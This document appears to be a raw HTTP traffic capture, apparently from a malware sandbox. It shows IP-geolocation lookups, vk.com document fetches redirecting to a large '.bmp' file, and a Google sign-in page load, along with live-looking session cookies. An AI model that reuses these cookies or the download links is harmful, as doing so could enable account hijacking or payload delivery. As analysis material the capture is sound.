HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QsYdtgl2dBWyPdw79GErrrKjzIGO%2BbMWpk%2F7vku1Gj26CEgE29pjQKDAZE5%2Fu3A%2FjJr%2BDxuYONty7Z6UEdjXhTMdzLcCtsWNODbS3Qy9Zy3d52B%2Fxev2XUIDQERGuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c5a86a6a29de-FUK

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ISFCJtVA3BryG69%2B8amQck8f%2BknvRSpuJ6jRP7QQzKnwVssmuhzDcMD7EcplpdmW%2FrqS7y5LIHwOqQwQChM%2BR4XMp1dbwlmkxCtgWOXa36degPwYGttrJHMODVMuJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c5abbfae29e5-FUK

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 302 Moved temporarily Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Cache-Control: max-age=1209600,private Date: Fri, 27 Oct 2023 03:15:18 GMT Location: https://dzen.ru/?yredirect=true NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Portal: Home Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]} Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST X-Yandex-Req-Id: 1698376518626469-11529435071248502417-balancer-l7leveler-kubr-yp-sas-19-BAL-143 set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 26 Oct 2025 03:15:18 GMT set-cookie: is_gdpr_b=CLbVbBCu1gEoAg==; Path=/; Domain=.yandex.ru; Expires=Sun, 26 Oct 2025 03:15:18 GMT set-cookie: _yasc=80tcXS0lQ2aUmk1QznKhqJS+/ggBDnvV4DZN6OcViJy/Wdsv6Jp6zaJoRufzSuMuelgZ; domain=.yandex.ru; path=/; expires=Mon, 24 Oct 2033 03:15:18 GMT; secure set-cookie: i=VtsZ3e6Lp8zTiGddhpnj5Sf7FbiDrp5Db67tuEAezr1kWN8LUzuEa26ax0aysTbJxXH25eAuTO6wW8cUqxkBUJQBOfw=; Expires=Sun, 26-Oct-2025 03:15:18 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly set-cookie: yandexuid=5485024171698376518; Expires=Sun, 26-Oct-2025 03:15:18 GMT; Domain=.yandex.ru; Path=/; Secure set-cookie: yashr=6649507301698376518; Path=/; Domain=.yandex.ru; Expires=Sat, 26 Oct 2024 03:15:18 GMT; Secure; HttpOnly

GET /?yredirect=true HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dzen.ru

HTTP/1.1 302 Found Content-Length: 0 Content-Type: application/json;charset=utf-8 Date: Fri, 27 Oct 2023 03:15:24 GMT Location: https://sso.passport.yandex.ru/push?uuid=a0c92fe7-42c2-4613-b8b7-fa00a304410a&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Fri, 27-Oct-2023 15:15:24 GMT; Max-Age=43200; Secure; HttpOnly Set-Cookie: _yasc=l98gJh2EiZDyBe/yI/8ol/LM8fL7o5c5sDi79FO0uh9uStrWCZ44CQ8mWtytlsmU; domain=.dzen.ru; path=/; expires=Mon, 24 Oct 2033 03:15:24 GMT; secure

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:25 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8V30rEtnNp4tfuppyy2MJkwQf85%2FSEM%2BIsUUfJzYGxPHukY2UnQeuB78F9gH%2Bp43RYA5CBw1gOQHSVj%2Bs5sEJlUD%2Fu1kYqvX2mX7MHalnUyLxvIAsS4mLCgASz87"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c6449d8edbe1-LAX alt-svc: h3=":443"; ma=86400

GET /push?uuid=a0c92fe7-42c2-4613-b8b7-fa00a304410a&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sso.passport.yandex.ru Cookie: yashr=6649507301698376518; yandexuid=5485024171698376518; i=VtsZ3e6Lp8zTiGddhpnj5Sf7FbiDrp5Db67tuEAezr1kWN8LUzuEa26ax0aysTbJxXH25eAuTO6wW8cUqxkBUJQBOfw=; _yasc=80tcXS0lQ2aUmk1QznKhqJS+/ggBDnvV4DZN6OcViJy/Wdsv6Jp6zaJoRufzSuMuelgZ; is_gdpr_b=CLbVbBCu1gEoAg==; is_gdpr=0

HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Oct 2023 03:15:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1954 Connection: close Vary: Accept-Encoding X-Download-Options: noopen X-Content-Type-Options: nosniff Surrogate-Control: no-store Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Expires: 0 X-DNS-Prefetch-Control: off X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-eaaaf75dc9d208eeb9a785f9ae9e9baa' 'self'; img-src 'self' Set-Cookie: mda2_beacon=1698376527518; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Set-Cookie: ys=c_chck.35537404; Domain=.yandex.ru; Secure; Path=/ Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Referrer-Policy: origin ETag: W/"7a2-ov8LyS3yv96dGNQ3IRVub+zWC1w" Strict-Transport-Security: max-age=315360000; includeSubDomains

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cache-control: max-age=28800 x-iplb-request-id: AC46C793:801C_93878F2E:0050_653AF445_F90F36:BDC9 x-iplb-instance: 30782 CF-Cache-Status: HIT Age: 14092 Last-Modified: Thu, 26 Oct 2023 23:20:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fmVLjunNANI2kh4oYfghxyLeMojQ7ms%2BeVrBm6rELIDwLAZ6HVdAdUP5BAXv3jFRuB3QeqMn0rdEPueeigszO8dQ%2FyoMWp%2Bg0m6fwYd9AzLuKng0rKHsIyNDTg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c65cdf0229d1-FUK alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive access-control-allow-origin: http*://*db-ip.com cache-control: max-age=180 x-iplb-request-id: AC46C790:B438_93878F2E:0050_653B2B51_F8B0BD:BDCA x-iplb-instance: 30782 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5UEWCIx8WuWTtOrJuOfgpgKcyPJkfqGr7NXTgBEEHVy9cuns73daMFCeIMVqVkNYrLO29nAd21z5%2BuCOF%2B7CPdtRfsJiWusCZYo9l0LErAXX4UkzaR8tv80GmcAhODo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c65da93229d2-FUK alt-svc: h3=":443"; ma=86400

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335662 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_667205062?hash=Svqj7zCdrED1hyD81lRt9NeObuiSXNy8bJzdPsMUx1w&dl=zCXthZXeky7MxZ1PAEfvkLNfEWm2gZlF4zhzbI8exz4&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:15:37 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909618/u52355237/docs/d9/623cc18b4685/tmvwr.bmp?extra=5WUKP60iriNLZAh7S4FosuziGQcjWCkFZZ4x7xp8sOkXLhbwvbH5419WeD9RJCKirsxra8PHrHOD5PoaLYO4q-OZRkssRi22_oLTccilnyFnSWLZiks4PJxdOyEvR3dhcPSVd4aQv4cBG1g9 X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u52355237/docs/d9/623cc18b4685/tmvwr.bmp?extra=5WUKP60iriNLZAh7S4FosuziGQcjWCkFZZ4x7xp8sOkXLhbwvbH5419WeD9RJCKirsxra8PHrHOD5PoaLYO4q-OZRkssRi22_oLTccilnyFnSWLZiks4PJxdOyEvR3dhcPSVd4aQv4cBG1g9 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:38 GMT Content-Type: image/x-ms-bmp Content-Length: 5860668 Connection: keep-alive Last-Modified: Fri, 20 Oct 2023 16:10:55 GMT ETag: "6532a68f-596d3c" Expires: Sun, 26 Nov 2023 03:15:38 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8dPR9QLZQM26QyJjgL1gBJNSeVx55Xl6nY%2FW6YQc9XQ7Y1yJMyOBLQd9yDKTp1S79Oz6u0Yn1l3QMzBN9W5bVt9Ju784AGL5b4jTz1RLfAgL5VxFK%2F88hvRG1XQWWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c6b2adea29dd-FUK

GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000; includeSubDomains Set-Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD;Path=/;Expires=Sun, 26-Oct-2025 03:15:47 GMT;Secure;HttpOnly;Priority=HIGH X-Frame-Options: DENY Content-Security-Policy: script-src 'nonce-9VKLBltrdXGBqB71kaU3-w' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F Content-Encoding: gzip Date: Fri, 27 Oct 2023 03:15:47 GMT Expires: Fri, 27 Oct 2023 03:15:47 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

HTTP/1.1 302 Found Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 Oct 2023 03:15:47 GMT Location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywG5Ca3_U5z3i17rpBqe5XQmjKFOYO0l9YmCbXIH8Z7L2QC49OAi4jslnwM1-fvL4i20vS36Q Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport Content-Security-Policy: script-src 'nonce-hySKAKue0BbOdXrt9XdMbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self' Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: unsafe-none Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywG5Ca3_U5z3i17rpBqe5XQmjKFOYO0l9YmCbXIH8Z7L2QC49OAi4jslnwM1-fvL4i20vS36Q HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 X-Frame-Options: DENY Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 Oct 2023 03:15:47 GMT Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzdzet-5bFdLPdUq1j1uDurwe6kz_lHlw7J7WHjbFlxuWq7DWllN0DrN9yErviFid87F_Tyrw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1207139751%3A1698376547583620 Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport Content-Security-Policy: script-src 'nonce-ju4KxiPesnmqYwrdZEef7A' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk" Content-Encoding: gzip X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzdzet-5bFdLPdUq1j1uDurwe6kz_lHlw7J7WHjbFlxuWq7DWllN0DrN9yErviFid87F_Tyrw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1207139751%3A1698376547583620 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: DENY Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/ x-ua-compatible: IE=edge Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 Oct 2023 03:15:47 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: script-src 'nonce-nx-ovDS0GOaU5WanCpP9FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi" Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Cross-Origin-Resource-Policy: same-site Content-Encoding: gzip Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /images/branding/googlelogo/2x/googlelogo_color_74x24dp.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzdzet-5bFdLPdUq1j1uDurwe6kz_lHlw7J7WHjbFlxuWq7DWllN0DrN9yErviFid87F_Tyrw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1207139751%3A1698376547583620 Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ssl.gstatic.com Connection: Keep-Alive

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 3240 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Oct 2023 15:14:01 GMT Expires: Fri, 25 Oct 2024 15:14:01 GMT Cache-Control: public, max-age=31536000 Age: 43307 Last-Modified: Tue, 22 Oct 2019 18:15:00 GMT Content-Type: image/png Vary: Origin Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:15:49 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335662 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /_/bscframe HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzdzet-5bFdLPdUq1j1uDurwe6kz_lHlw7J7WHjbFlxuWq7DWllN0DrN9yErviFid87F_Tyrw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1207139751%3A1698376547583620 Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: accounts.google.com Connection: Keep-Alive Cookie: __Host-GAPS=1:w3yoiD0OM6wAuiZE7oF1_sFTROmb:0cGnX7jTYpmM9EwD

